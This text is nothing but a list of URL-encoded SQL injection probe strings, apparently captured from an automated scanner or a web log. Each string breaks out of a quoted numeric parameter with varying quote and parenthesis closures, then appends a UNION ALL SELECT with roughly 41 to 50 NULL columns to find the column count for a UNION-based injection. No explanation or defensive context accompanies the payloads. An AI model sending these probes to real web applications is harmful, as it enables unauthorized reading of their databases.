1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 